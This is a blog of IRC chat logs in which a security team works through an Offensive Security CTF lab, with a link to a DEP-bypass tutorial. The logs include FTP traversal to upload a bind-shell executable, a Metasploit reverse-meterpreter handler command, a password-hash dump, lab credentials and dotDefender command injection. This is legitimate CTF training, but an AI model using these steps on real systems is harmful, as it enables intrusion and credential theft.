Tuesday, 8 June 2010

Bypassing DEP with WPM & ROP

Hi,
I won't make the introduction very long, just to say that I have just made my first tutorial, and it's about bypassing DEP using the ROP and WPM technique. The tutorial was written in May and kept private for the Corelan team members, since the exploit goes public on June 07th.

It's a case study of the Audio Converter software and how to build a reliable exploit to bypass DEP. I hope you will like it (PS: the paper is in PDF format).

Download link 1

Wednesday, 12 May 2010

CHAPTER 03 : GhostBusters

CHAPTER 03 / Part 01 : You said GHOST ????

Now let's move to the last machine, the devil's machine called GHOST. With the same enthusiasm and bravery, with no tiredness and no fear, the warriors kept moving forward:


[01:37] <@corelanc0d3r> focus focus
[01:37] <@corelanc0d3r> yep
[01:38] <@mr_me> ok what is the next target
[01:38] <@mr_me> lets go guys
[01:38] <@TecR0c> 6.68
[01:38] <@TecR0c> it is running php
[01:38] <@_sinn3r> ok, let's try 6.68
[01:39] <@_sinn3r> meh, only HTTP open
[01:39] <@TecR0c> http://192.168.6.68/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000
[01:39] <@Lincoln> lol
[01:39] <@Lincoln> i wonder if they notice
[01:39] <@TecR0c> so its got php credits
[01:39] <@mr_me> php
[01:39] <@Lincoln> that all of us get multiple points
[01:39] <@Lincoln> at the same time
[01:39] <@TecR0c> who cares
[01:39] <@TecR0c> \
[01:39] <@TecR0c> =]
[01:39] <@Lincoln> hehe
[01:39] <@TecR0c> lets win !
[01:40] <@Lincoln> yes!

But faced with the psychotic power of the GHOST, they got a little bit confused at the beginning:

[01:41] <@_sinn3r> Is the web app actually a PHP, or ASP?
[01:41] <@_sinn3r> I'm seeing login.asp
[01:41] <@mr_me> asp
[01:41] <@mr_me> but php is install
[01:41] <@_sinn3r> gotcha
[01:41] <@TecR0c> it is IIS
[01:41] <@_sinn3r> rick2600: we're doing the offsec ctf, currently in phase 2.
[01:42] <@_sinn3r> past the noob filter
[01:42] <@TecR0c> microsoft
[01:43] <@_sinn3r> hmmm 6.68 isn't responding atm
[01:43] <@TecR0c> http://192.168.6.66/Sites/Knowledge/Membership/Inspired/ViewCode.asp
[01:44] <@rick2600> cool...
[01:44] <@TecR0c> the vuln was patched in 2003
[01:44] <@TecR0c> ;/
[01:45] <@_sinn3r> http://192.168.6.68/asdfasdf
[01:45] <@_sinn3r> haha... wtf
[01:46] <@TecR0c> yep
[01:46] <@TecR0c> private you will get
[01:46] <@TecR0c> if the file doesn't exist
[01:46] <@_sinn3r> si
[01:47] <@mr_me> guys
[01:47] <@mr_me> check this out
[01:48] <@TecR0c> pattern
[01:48] <@mr_me> http://192.168.6.68/test.asp?source=../../
[01:48] <@_sinn3r> huh.......
[01:48] <@mr_me> some dodgy stuff here
[01:48] <@Lincoln> rolf
[01:48] <@Lincoln> that looks like my cat

However, nothing stopped them, and _sinn3r found a treasure of the GHOST:

[01:48] <@TecR0c> if you go ../ up and down
[01:48] <@TecR0c> you will see
[01:48] <@TecR0c> i think this is a big clue
[01:48] <@mr_me> it changes
[01:48] <@_sinn3r> I see a butt
[01:49] <@mr_me> right
[01:49] <@_sinn3r> i think it just changes randomly
[01:49] <@mr_me> keep transversing
[01:49] <@mr_me> really
[01:49] <@_sinn3r> when you see the butt image, see the html....
[01:49] <@_sinn3r> no pic code, no css
[01:50] <@mr_me> yeh
[01:50] <@mr_me> odd

After a little work on that machine, mr_me really understood what they were facing:

[01:51] <~corelanc0d3r> try source=alert();
[01:52] <@_sinn3r> wait, there is javascript
[01:52] <@TecR0c> dont think alert();
[01:52] <@TecR0c> is anything
[01:52] <@TecR0c> _sinn3r, where is the js ?
[01:53] <@_sinn3r> guys
[01:53] <@_sinn3r> wget 192.168.6.68/javascript
[01:53] <@corelanc0d3r> javascript is a file right ?
[01:53] <@_sinn3r> yes, a file
[01:53] <@TecR0c> oh hello
[01:53] <@TecR0c> lol
[01:53] <@corelanc0d3r> time for some reversing :D
[01:53] <@TecR0c> thats the code playing
[01:53] <@TecR0c> with the images !
[01:53] <@_sinn3r> yes
[01:54] <@mr_me> basterds

Now they started to use the weapons of mass destruction:

[02:04] <@TecR0c> got a udp scan ?
[02:04] <~corelanc0d3r> I'll do one
[02:05] <@TecR0c> thanks
[02:05] <@Lincoln> only checked this
[02:05] <@Lincoln> 161/udp closed snmp
[02:05] <@TecR0c> do you know how to test udp ports with nc ?
[02:05] <@corelanc0d3r> nope, I thought it was tcp only
[02:05] <@Lincoln> -u
[02:05] <@corelanc0d3r> not sure
[02:05] <@corelanc0d3r> -U ?
[02:05] <@corelanc0d3r> ok
[02:05] <@Lincoln> yes
[02:06] <@Lincoln> port scanning so slow, tried to do all 1-65535 will take until next year
[02:06] <@Lincoln> bet there is another service running on some port

At the same time, the great warrior corelanc0d3r started his mystic approach and found a first vuln in the GHOST:

[02:06] <@corelanc0d3r> haha http://192.168.6.66/1/%
[02:06] <@corelanc0d3r> bad ph33r
[02:06] <@corelanc0d3r> :D
[02:08] <@TecR0c> lol
[02:09] <@TecR0c> http://192.168.6.68/corelanteam/%
[02:09] <@TecR0c> ;)
[02:09] <@corelanc0d3r> lol
[02:09] <@corelanc0d3r> so they have some input validation
[02:09] <@corelanc0d3r> triggers on %

Unfortunately, in the other dimension, some unfair actions were taken against the team:

[02:12] <@corelanc0d3r> looks like some dude posted solution to phase1 in the HSIYF channel
[02:12] <@corelanc0d3r> wtf - that's not really fair
[02:12] <@Lincoln> aww lame
[02:13] <@TecR0c> ah
[02:13] <@mr_me> fukn hell
[02:13] <@mr_me> thats bad

After a UDP scan fight and an unsuccessful SNMP approach, it was time to leave the machine alone for a while and start thinking, and that's the power of the team: thinking and sharing:

[02:28] <~corelanc0d3r> what is the difference between the index.asp page and /1/index.asp page ?
[02:28] <~corelanc0d3r> different post operations
[02:28] <~corelanc0d3r> differend field names
[02:28] <~corelanc0d3r> perhaps there's a bug where you can feed an asp page and make the app think it's an image
[02:28] <@chap0> one fake one real :D just guessing
[02:29] <@mr_me> ok possible path to execution
[02:29] <@mr_me> lets realli think
[02:29] <@mr_me> we dont have much on this one

But they really needed some rest, so they took a little time to play with a nice pirate picture:

[02:30] <@corelanc0d3r> was just playing with some url's
[02:30] <@corelanc0d3r> like this
[02:31] <@corelanc0d3r> http://192.168.6.66/index.asp/1/BBP.jpg
[02:31] <@corelanc0d3r> just playing

TecR0c and corelanc0d3r came up with new and fresh ideas as always; thinking outside the box is very important:

[02:33] <@TecR0c> we cracking those hashes ?
[02:33] <@TecR0c> maybe u need them to login
[02:33] <@corelanc0d3r> yeah good idea
[02:33] <@corelanc0d3r> machine1 : only one IP
[02:33] <@corelanc0d3r> dns servers on 192.168.6.1
[02:33] <@corelanc0d3r> zone transfers ?
[02:35] <@TecR0c> 192.168.64.2 i think is their dns server
[02:35] <@mr_me> sinn3r: you check the images?
[02:35] <@mr_me> _sinn3r*

Acting and thinking like hackers, every technique was tried:

[02:49] <@TecR0c> maybe we need to do social engineering
[02:49] <@TecR0c> lolll
[02:49] <@TecR0c> anyone got muts numbe r?
[02:49] <@corelanc0d3r> haha we can PM him
[02:50] <@_sinn3r> I tried

A little bit of confusion came again:

[02:52] <@corelanc0d3r> are we sure this is a IIS server ?
[02:52] <@TecR0c> can we run fasttrack
[02:52] <@TecR0c> lol
[02:52] <@_sinn3r> it says Microsoft
[02:52] <@mr_me> yes
[02:52] <@corelanc0d3r> where does it say Microsoft ?
[02:53] <@mr_me> def iis
[02:53] <@TecR0c> yep
[02:53] <@mr_me> in the .asp extension :P
[02:53] <@_sinn3r> sniff it with wireshark, you'll see it.
[02:53] <@corelanc0d3r> no way they tried to make it look like IIS ?
[02:53] <@_sinn3r> possible
[02:53] <@corelanc0d3r> I mean could be vulnerable apache version
[02:53] <@mr_me> true
[02:53] <@corelanc0d3r> changed
[02:54] <@_sinn3r> "Server: Microsoft-IIS "
[02:54] <@corelanc0d3r> I can do that on Apache as well
[02:54] <@corelanc0d3r> mod_rewrite etc
[02:54] <@_sinn3r> yeah, I know...
[02:54] <@corelanc0d3r> the behaviour just looks like mod_rewrite to me
[02:54] <@mr_me> corelanc0d3r: ill try other os detectors
[02:55] <@corelanc0d3r> k
[02:55] <@TecR0c> http://192.168.6.67/Sites/
[02:55] <@TecR0c> says Microsoft IIS
[02:55] <@TecR0c> there
[02:55] <@Lincoln> im pilfering through .70 for anything, clues
[02:55] <@Lincoln> nada
[02:55] <@corelanc0d3r> yeah, again
[02:55] <@TecR0c> doesn't look that real though
[02:55] <@corelanc0d3r> they could have tried hard to make it look like IIS

It was 03:07 AM when corelanc0d3r finally found a back door:

[03:07] <@corelanc0d3r> the pic with the butt is some kind of door
[03:07] <@corelanc0d3r> it's a backdoor, but still a door
[03:07] <@corelanc0d3r> :D
[03:07] <@_sinn3r> ew
[03:07] <@Lincoln> rolf
[03:07] <@_sinn3r> noooooooooooo
[03:07] <@corelanc0d3r> yeah I know - bad joke
[03:07] <@_sinn3r> :-D
[03:07] <@_sinn3r> lol
[03:07] <@TecR0c> im not going to execute that
[03:07] <@TecR0c> ;/
[03:07] <@chap0> hahaha

After becoming desperate, the mystic corelanc0d3r reminded the team of the Corelan team slogan:

[03:13] <@corelanc0d3r> Corelan Slogan : Never underestimate the power of...
[03:13] <@corelanc0d3r> ummm..
[03:13] <@corelanc0d3r> ... underestimation ?

After searching for Apache exploits, SSL exploits and hidden module vulnerabilities, they started to talk in an incomprehensible language:

[03:17] <@corelanc0d3r> what do you mean ?
[03:17] <@_sinn3r> i meant ":-p"
[03:17] <@_sinn3r> sorry
[03:17] <@corelanc0d3r> haha :D
[03:17] <@_sinn3r> lol
[03:17] <@corelanc0d3r> and sus = ?
[03:18] <@mr_me> sus peciaous
[03:18] <@corelanc0d3r> haha
[03:18] <@mr_me> suspecious
[03:18] <@corelanc0d3r> okido
[03:18] <@mr_me> yeh
[03:19] <@TecR0c> damn

To Be Continued ...

Tuesday, 11 May 2010

CHAPTER 02 : Killing the n00bKiller

Chapter 2 - PART 01 : Searching the graves

Entering the VPN, we had to set our objectives, and that's the speciality of TecR0c:

[18:32] <@TecR0c> the target is actually
[18:32] <@TecR0c> http://192.168.6.67/
[18:32] <@TecR0c> muahahaha
[18:33] <@Sud0> hahahaha
[18:33] <@Sud0> np
[18:33] <@Sud0> :)
[18:33] <@mr_me> nice brother
[18:33] <@TecR0c> we are gonna own this !

Some minutes later there was a big silence in the IRC channel:

[18:39] <@Sud0> anyone here ?
[18:40] <@mr_me> we are here
[18:40] <@mr_me> just working
[18:40] <@mr_me> my freind
[18:40] <@mr_me> :)
[18:42] <@Sud0> though
[18:42] <@Sud0> i lost connection
[18:42] <@Sud0> nothing was mooving here :)

As I said before, TecR0c was an expert at selecting targets, so we had to change target again ;)

[18:47] <@TecR0c> 71 72 are the same aswell
[18:48] <@Sud0> i saw it
[18:48] <@ekse> hi guys
[18:48] <@Sud0> hi ekse
[18:49] <@TecR0c> you can ftp to 192.168.6.70
[18:49] <@TecR0c> anonymous
[18:50] <@mr_me> ftp access
[18:50] <@TecR0c> yep it windows 7 utimate
[18:51] <@Sud0> yes
[18:51] <@TecR0c> i think its 64bit aswell
[18:51] <@Sud0> directory traversal
[18:51] <@Sud0> not working

Always following TecR0c, who wanted to use a new ROP technique :)

[18:51] <@TecR0c> lets do ROP
[18:51] <@TecR0c> lol
[18:52] <@Sud0> hahaha
[18:53] <@Sud0> @TecR0c all surgemail are post auth exploit

Then mr_me arrived with new, fresh, sweet and technical ideas :)

[19:25] <@Sud0> hola mr_me
[19:26] <@mr_me> Sud0: hola
[19:26] <@mr_me> ok so im abit stumped
[19:26] <@Sud0> ssup ? :)
[19:26] <@Sud0> hahah
[19:27] <@Sud0> what's happening ?
[19:27] <@mr_me> 6.67 is just login prompt
[19:27] <@mr_me> prompts
[19:27] <@Sud0> hahahaha yes
[19:27] <@mr_me> and 6.70 webmail
[19:27] <@mr_me> duno yet
[19:27] <@Sud0> yup :)
[19:27] <@mr_me> i might bruteforce a pop account
[19:27] <@mr_me> or ftp
[19:27] <@mr_me> but duno any undernsmae
[19:27] <@mr_me> usernames**

After that, TecR0c made an extraordinary discovery using his ROP technique:

[19:36] <@TecR0c> wdf
[19:36] <@TecR0c> its linux box
[19:36] <@_sinn3r> are you guys playing w/ CTF at the moment?
[19:37] <@Sud0> @mr_me not vuln on that
[19:37] <@Sud0> yes _sinn3r and u ?
[19:37] <@_sinn3r> at the moment, no
[19:37] <@TecR0c> its ubuntu 8.10
[19:37] <@TecR0c> ;)
[19:37] <@Sud0> what IP TecR0c ?
[19:37] <@_sinn3r> kinda busy with exploit-db... lots of tickets.
[19:38] <@TecR0c> 71
[19:38] <@_sinn3r> I did hear it's pretty nasty... a couple guys at exploit-db were working on the CTF labs.
[19:38] <@TecR0c> ah
[19:38] <@TecR0c> wait
[19:38] <@TecR0c> lol
[19:38] <@TecR0c> its my machine hehe
[19:38] <@TecR0c> =]
[19:38] <@Sud0> hahahahahhahaha
[19:38] <@Sud0> hahahahahhahaha
[19:38] <@TecR0c> got excited for one sec
[19:38] <@TecR0c> :P
[19:40] <@Sud0> héhé
[19:41] <@Sud0> 71 ---> vista ultimate ;)

After analysing the machine, we agreed on a nice plan:

[20:51] <@Sud0> @tecR0c 21 -------------> should be vuln to directory traversal
[20:52] <@TecR0c> so what we need to do ?
[20:52] <@Sud0> 1- got a directory traversal
[20:52] <@Sud0> here is the scenario
[20:53] <@Sud0> 1- directory traversal on Complete FTP
[20:53] <@Sud0> 2- Get an account on webmail
[20:53] <@Sud0> 3- use a remote exploit against webmail to get root (i ment shell)
[20:53] <@Sud0> 4- use a local root exploit against qualcomm popassd
[20:53] <@Sud0> got it ?
[20:53] <@mr_me> yeh
[20:54] <@mr_me> qualcom
[20:54] <@mr_me> we knew
[20:54] <@TecR0c> cool
[20:54] <@TecR0c> ok lets make this happen

After 06 hours of trying a directory traversal as anonymous against machine 70 without success, Lincoln came to save us:

[23:30] <@corelanc0d3r> doing full scan
[23:30] <@Lincoln> cd \..\..\
[23:31] <@Sud0> @Lincoln : not working with me
[23:31] <@Sud0> i tested it 10000 times
[23:32] <@Sud0> @Lincoln don't work cd \..\..\
[23:32] <@Lincoln> ftp> pwd
[23:32] <@Lincoln> 257 "/MyDocuments" is current directory.
[23:32] <@Lincoln> ftp> ls
[23:32] <@Lincoln> 200 PORT command successful.
[23:32] <@Lincoln> 150 Opening ASCII mode data connection for listing
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Music
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Pictures
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 07 23:49 My Videos
[23:32] <@Lincoln> dr-xrwx--- 1 admin users 0 May 08 00:03 test
[23:32] <@Lincoln> 226 Transfer complete.
[23:32] <@Sud0> shit
[23:32] <@Lincoln> ftp> cd \..\..\

Lincoln explained the problem to us, and TecR0c finished it with a nice phrase:

[23:35] <@Sud0> devil
[23:35] <@_sinn3r> I still can't get noobSeccret.txt.......... the damn thing just times out.
[23:35] <@Sud0> what pass ?
[23:35] <@Lincoln> killthen00b
[23:35] <@chap0> I mentioned it earlier but
[23:35] <@chap0> hahaha
[23:35] <@chap0> it was on the page they said to read the whole page
[23:35] <@chap0> haha
[23:35] <@chap0> :D
[23:35] <@chap0> anyway good going linc for bringing it to the light!
[23:35] <@_sinn3r> "Gateway Time-out
[23:35] <@_sinn3r> The gateway did not receive a timely response from the upstream server or application."
[23:36] <@Sud0> nice lol
[23:36] <@Sud0> where on the website Lincoln lol
[23:36] <@Lincoln> FTP Credentials are : devil / killthen00b
[23:36] <@Lincoln> under helpful hints on the bottom
[23:36] <@Lincoln> of info blog
[23:36] <@Sud0> hahahahaha
[23:37] <@Sud0> i'm so umb
[23:37] <@Sud0> i dumb
[23:37] <@Sud0> lol
[23:37] <@TecR0c> WTF

After some teamwork, we discovered the default executable folder of SurgeMail in which to put our backdoor:

[00:11] <@Lincoln> try cd /MyDocuments/....../....../....../..../....../surgemail/web
[00:11] <@TecR0c> 07 23:52:18.13:1876: IMAP 3.8k4-4, User connected (192.168.6.143) (192.168.6.71) socket=1588
[00:11] <@TecR0c> ok so the people who have owned it must have to use imap aswell
[00:11] <@TecR0c> ;/
[00:17] <@Sud0> CGI did not respond correctly, it probably exited abnormally or the file may not exist or have +x access (bind.exe) ()
[00:18] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:21] <@mr_me> hey sudo
[00:21] <@mr_me> u have web root
[00:21] <@mr_me> ?
[00:22] <@_sinn3r> you think 192.168.6.72 supports ASP?
[00:22] <@_sinn3r> server: DManager........
[00:23] <@_sinn3r> nnnnnoope...
[00:23] <@Sud0> hum
[00:23] <@Sud0> yes
[00:23] <@Sud0> shit
[00:23] <@Sud0> but
[00:23] <@Sud0> i loaded
[00:23] <@Sud0> the exe
[00:23] <@Sud0> bind.exe
[00:23] <@Lincoln> yeah i missed that one lol
[00:23] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:23] <@Lincoln> http://192.168.6.72/evil.html
[00:23] <@Sud0> http://192.168.6.71/scripts/bind.exe
[00:24] <@_sinn3r> bindshell for what port?
[00:24] <@Sud0> 4444

09/05/2010:

A new day, and corelanc0d3r started thinking about new technologies and doing what he loves best: writing nice articles and blogs:

[00:31] <@corelanc0d3r> trying some stuff
[00:31] <@corelanc0d3r> but
[00:31] <@corelanc0d3r> perhaps this may help
[00:31] <@corelanc0d3r> go to the admin page of surgemail
[00:31] <@corelanc0d3r> log in with admin account
[00:31] <@corelanc0d3r> corelanc0d3r
[00:31] <@corelanc0d3r> password
[00:31] <@corelanc0d3r> admimn
[00:31] <@corelanc0d3r> admin
[00:31] <@corelanc0d3r> you can create blogs
[00:32] <@corelanc0d3r> maybe we can do something with this

[00:33] <@corelanc0d3r> http://192.168.6.70/blogs/corelanc0d3r
[00:34] <@corelanc0d3r> hahaha

After that, Lincoln gave us a nice shell:

[00:46] <@Lincoln> CAN YOU SAY WOOT
[00:46] <@Lincoln> msf exploit(mhandler) > exploit
[00:46] <@Lincoln> [*] Started reverse handler on 192.168.6.135:4444
[00:46] <@Lincoln> [*] Starting the payload handler...
[00:46] <@Lincoln> [*] Sending stage (748032 bytes) to 192.168.6.135
[00:46] <@Lincoln> [*] Meterpreter session 1 opened (192.168.6.135:4444 -> 192.168.6.135:44382)
[00:46] <@_sinn3r> whoa, how?
[00:46] <@corelanc0d3r> wtf
[00:46] <@corelanc0d3r> :D
[00:46] <@_sinn3r> how?
[00:47] <@TecR0c> wtf
[00:47] <@TecR0c> ohyeeeeee
[00:47] <@mr_me> fukn hell
[00:47] <@TecR0c> your the man
[00:47] <@TecR0c> =]
[00:47] <@_sinn3r> how how how how how
[00:47] <@chap0> lol
[00:47] <@mr_me> WOW

But it was not as nice as it looked:

[00:48] <@Lincoln> ignore it guys
[00:48] <@Lincoln> no
[00:48] <@Lincoln> no
[00:48] <@Lincoln> i fucked up
[00:48] <@Lincoln> hahahaha
[00:48] <@corelanc0d3r> not worky ?
[00:48] <@Sud0> hahaha
[00:48] <@Sud0> :)
[00:48] <@Lincoln> no....
[00:48] <@Lincoln> too stupid to admit
[00:48] <@Lincoln> sorry guys ignore
[00:48] <@Sud0> your own machine
[00:48] <@Sud0> :)
[00:48] <@Lincoln> yep....
[00:48] <@Lincoln> hahahah
[00:48] <@_sinn3r> awwwwwwwwww......
[00:48] <@Lincoln> im sorry
[00:48] <@Lincoln> lol
[00:48] <@_sinn3r> :-)
[00:49] <@Lincoln> <------------- SUPER embarrassed

After I was disconnected, with my unsuccessful bind shell, the team continued to work on the killthen00b machine (one man can't make a team); there was a shell:

[01:02] <@corelanc0d3r> ok - need a little help here
[01:02] <@corelanc0d3r> how do I set up metasploit
[01:02] <@corelanc0d3r> to listen for a reverse incoming meterpreter session
[01:02] <@corelanc0d3r> on let's say port 5555
[01:02] <@TecR0c> multi/handler
[01:03] <@TecR0c> use multi/handler
[01:03] <@TecR0c> show options
[01:03] <@_sinn3r> ./msfcli multi/handler payload=windows/meterpreter_reverse_tcp lhost=[your ip] lport=5555 E
[01:04] <@corelanc0d3r> failed Payload has not been selected
[01:04] <@_sinn3r> windows/meterpreter/reverse_tcp
[01:06] <@corelanc0d3r> reverting box again ?
[01:06] <@_sinn3r> two more people just got 50 pts......
[01:11] <@corelanc0d3r> bloody hell
[01:11] <@corelanc0d3r> rooted .70
[01:11] <@_sinn3r> how?
[01:11] <@corelanc0d3r> simple
[01:11] <@corelanc0d3r> really simple
[01:11] <@corelanc0d3r> ftp traversal
[01:11] <@corelanc0d3r> go to c:\surgemail\scripts
[01:11] <@corelanc0d3r> upload eveil
[01:11] <@corelanc0d3r> evil exe
[01:11] <@corelanc0d3r> call it from browser
[01:11] <@corelanc0d3r> done

Here we are: using Meterpreter, one of the glorious warriors opened a remote desktop:

[01:21] <@_sinn3r> ok mr_me
[01:21] <@_sinn3r> do this
[01:21] <@_sinn3r> rdesktop 192.168.6.70
[01:21] <@_sinn3r> username: sinn3r
[01:21] <@_sinn3r> password: veryphat
[01:21] <@mr_me> woot
[01:21] <@mr_me> shell
[01:22] <@Lincoln> ahh sexy
[01:22] <@Lincoln> meterpreter > run hashdump
[01:22] <@Lincoln> [*] Obtaining the boot key...
[01:22] <@Lincoln> [*] Calculating the hboot key using SYSKEY 8cbc4040791fac141f35cba5f197d50f...
[01:22] <@Lincoln> [*] Obtaining the user list and keys...
[01:22] <@Lincoln> [*] Decrypting user keys...
[01:22] <@Lincoln> [*] Dumping password hashes...
[01:22] <@Lincoln> Administrator:500:aad3b435b51404eeaad3b435b51404ee:07eaa2b600669980aa3268fd8cc3f0e5:::
[01:22] <@Lincoln> Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[01:22] <@Lincoln> devil:1001:aad3b435b51404eeaad3b435b51404ee:3cc3bac4b37e26d8208469533c59e2c6:::
[01:22] <@Lincoln> sinn3r:1002:aad3b435b51404eeaad3b435b51404ee:05597a07ce55307b3e6a3bd1a7abe12d:::
[01:22] <@Lincoln> going to run those through offsec cracker

And finally they got the beast down:

[01:28] <@_sinn3r> I don't see a proof.txt in devil's desktop
[01:28] <@_sinn3r> Peter, what am I supposed to look for?
[01:30] <@_sinn3r> ?
[01:30] <@corelanc0d3r> Administrators Desktop
[01:30] <@_sinn3r> ok... damn, just the wrong desktop
[01:30] <@Lincoln> can someone rehit evil.exe
[01:30] <@Lincoln> on .70
[01:30] <@_sinn3r> hit
[01:30] <@Lincoln> thanks
[01:32] <@Lincoln> doh
[01:32] <@Lincoln> no tftp on win7
[01:32] <@Lincoln> thats right
[01:32] <@_sinn3r> you need to manually enable it
[01:32] <@Lincoln> sinner you still on rdp?
[01:32] <@_sinn3r> not anymore. go ahead.
[01:33] <@_sinn3r> meterpreter > cat proof.txt
[01:33] <@_sinn3r> a61b0c1bf71267289efeecf778b1e51e
[01:34] <@Lincoln> oO rolf
[01:34] <@corelanc0d3r> does anyone know if there is only one proof file per machine ?
[01:34] <@Lincoln> a61b0c1bf71267289efeecf778b1e51e
[01:34] <@Lincoln> k got it
[01:34] <@_sinn3r> woohoo 50 pts
[01:35] <@corelanc0d3r> nicey

CHAPTER 01 : 08-05-2010 --> VS n00bFilter

Hey,
Here we are, we have to pass the n00bfilter, as we are not n00bs :-)

08/05/2010 ---> there was a little confusion at the beginning about the noob filter:

[16:00] <@Sud0> none of the filter web page opens :(
[16:01] <@Sud0> http://www1.noob-filter.com / http://www2.noob-filter.com
[16:01] <@Sud0> not working, both of them :(
[16:01] <~corelanc0d3r> too much traffic ?
[16:01] <@TecR0c> they are working for me and mr_me
[16:01] <@Sud0> maybe yeah
[16:02] <@Sud0> nope for me not working :'(
[16:02] <@corelanc0d3r> @Tec : any luck with the noob filter ?
[16:02] <@TecR0c> not yet
[16:03] <@TecR0c> ill let you know
[16:03] <@TecR0c> if we get past it
[16:03] <~corelanc0d3r> k
[16:06] <@TecR0c> hrm
[16:06] <@TecR0c> seems like noob-filter only works with iexplorer
[16:07] <@corelanc0d3r> ok what do we need to do ?
[16:10] <@TecR0c> working with firefox now
[16:10] <@TecR0c> all good

Some time later, we got the dotDefender key, and this is what it looked like (general panic):

[16:21] <@Sud0> anyone here ?
[16:22] <@chap0> yo
[16:22] <@corelanc0d3r> yo
[16:22] <@corelanc0d3r> and ?
[16:23] <@Sud0> i found
[16:23] <@Sud0> http://www1........ /dotdefender
[16:23] <@corelanc0d3r> yeah
[16:23] <@corelanc0d3r> I'm trying the exploit for it
[16:23] <@corelanc0d3r> http://www.exploit-db.com/exploits/10261

But with no success at the beginning (mr_me had just arrived):

[16:24] * mr_me (mr_me@hidden-8B8DC393.lnk.telstra.net) has joined #corelan
[16:24] * corelanOp sets mode: +o mr_me
[16:24] <@Sud0> just tried it
[16:24] <@mr_me> whats the exploit
[16:24] <@TecR0c> does it work ?
[16:24] <@corelanc0d3r> no
[16:24] <@corelanc0d3r> don't think so
[16:24] <@corelanc0d3r> any other services on that server ?
[16:25] <@Sud0> not working
[16:25] <@Sud0> tried it
[16:25] <@Sud0> The Site Management application of dotDefender is reachable as a web
[16:25] <@Sud0> application (https:site/dotDefender/)
[16:25] <@Sud0> on the webserver. After passing the Basic Auth login you can
[16:25] <@Sud0> create/delete applications.
[16:25] <@Sud0> The mentioned vulnerability is in the 'deletesite' implementation and
[16:25] <@Sud0> the 'deletesitename' variable.
[16:25] <@Sud0> Insufficient input validation allows an attacker to inject arbitrary commands.
[16:25] <@Sud0>
[16:25] <@Sud0> we have to pass the basic auth before

Next step: getting the authentication credentials (due to excitement, chap0 needed three retries before he could write w00t):

[16:29] <@mr_me> we def know the login is admin
[16:29] <@TecR0c> i can confirm that it is admin aswell
[16:29] <@TecR0c> password defined previously
[16:29] <@TecR0c> ;/
[16:29] <@TecR0c> im looking at the installation guide
[16:29] <@corelanc0d3r> not sure - it's not because the login says it's admin, that it is admin
[16:29] <@corelanc0d3r> ah ok
[16:29] <@corelanc0d3r> what is the default pass ?
[16:29] <@mr_me> looking for it atm
[16:29] <@TecR0c> doesn't look like there is a default password
[16:29] <@Sud0> found it guys
[16:29] <@Sud0> we have noob1
[16:29] <@Sud0> :d
[16:30] <@Sud0> hahahahahahahahahahahahahahahaha
[16:30] <@Sud0> guys
[16:30] <@Sud0> listen
[16:30] <@Sud0> @corelanc0d3r
[16:30] <@mr_me> i gotr
[16:30] <@mr_me> haha
[16:30] <@Sud0> @mr_me
[16:30] <@mr_me> i logged in
[16:30] <@Sud0> password
[16:30] <@chap0> all ears big ones
[16:30] <@mr_me> hahaha
[16:30] <@Sud0> admin/password
[16:30] <@mr_me> yeh
[16:30] <@chap0> W))T!
[16:30] <@chap0> w001
[16:30] <@chap0> w00t!
[16:30] <@chap0> sry
[16:30] <@chap0> hehehe
[16:30] <@TecR0c> ah
[16:30] <@TecR0c> timing out
[16:30] <@mr_me> its not root
[16:30] <@mr_me> woot nothing
[16:30] <@corelanc0d3r> so - dotdefender password ?
[16:30] <@corelanc0d3r> or just page login ?
[16:30] <@mr_me> admin:password
[16:31] <@mr_me> haha
[16:31] <@TecR0c> ok no one has passed phase 1 yet
[16:31] <@Sud0> admin/password

Then a lot of suspense; take a look (mr_me thought he was one of the Apollo crew having issues in space and calling NASA):

[16:32] <@mr_me> we are having issues here
[16:32] <@mr_me> its very slow access
[16:32] <@mr_me> yes
[16:32] <@chap0> si i agree forever and a day to get in
[16:32] <@TecR0c> Lincoln, http://www2.noob-filter.com/dotdefender/index.cgi
[16:32] <@Lincoln> ah k
[16:33] <@Sud0> yes
[16:33] <@Sud0> very slow
[16:33] <@Sud0> i built the header
[16:33] <@Sud0> and executing the command
[16:33] <@Sud0> using the exploit
[16:33] <@Sud0> but problem
[16:33] <@Sud0> very slow
[16:33] <@chap0> my page is still loading
[16:33] <@chap0> :/
[16:33] <@mr_me> me 2
[16:33] <@mr_me> what the
[16:34] <@chap0> what happen?
[16:34] <@corelanc0d3r> someone DoS'ed it ?

In the next minutes some of us became a little bit paranoid about the user agent:

[16:39] <@mr_me> i have the evil RCE request
[16:40] <@mr_me> but its way to slow
[16:40] <@mr_me> the server
[16:40] <@mr_me> this is a joke
[16:40] <@corelanc0d3r> yeah didn't scale very well
[16:41] <@Sud0> waiting result of my ls-als
[16:42] <@mr_me> ok it looks like its ment to be slow
[16:42] <@mr_me> thats the hint i get from muts
[16:42] <@corelanc0d3r> try just catting the file
[16:42] <@corelanc0d3r> from root
[16:42] <@corelanc0d3r> or from current folder
[16:42] <@corelanc0d3r> may be faster
[16:43] <@Sud0> yes
[16:44] <@Sud0> just waiting the page to be loaded
[16:44] <@Sud0> mr_me ---> ment to be slow ?.??????????????
[16:44] <@mr_me> well
[16:45] <@mr_me> i think maybe we change the user agent
[16:46] <@corelanc0d3r> yeah I'll try
[16:46] <@corelanc0d3r> I'll change it to Corelan Team

Finally one of us got access to the dotDefender admin page, and guess who? (TecR0c)

[16:47] <@TecR0c> haha
[16:47] <@TecR0c> im in site management
[16:47] <@TecR0c> w00t
[16:47] <@chap0> good at least one of us is
[16:47] <@mr_me> doesnt load past that
[16:47] <@chap0> :D
[16:47] <@chap0> bla
[16:48] <@TecR0c> na still loading
[16:48] <@TecR0c> god damn
[16:49] <@mr_me> sudo
[16:49] <@mr_me> Sud0
[16:50] <@mr_me> did it load for u?
[16:50] <@mr_me> whats the response headers
[16:50] <@mr_me> paste em here

Then we could finally execute the first command on the server (id):

[16:50] <@mr_me> ok
[16:50] *Lincoln* hey
[16:52] <@Sud0> uid=48(apache) gid=494(apache) groups=494(apache)
[16:52] <@Sud0> /usr/local/APPCure-full/lib/admin
[16:52] <@Sud0> uid=48(apache) gid=494(apache) groups=494(apache)
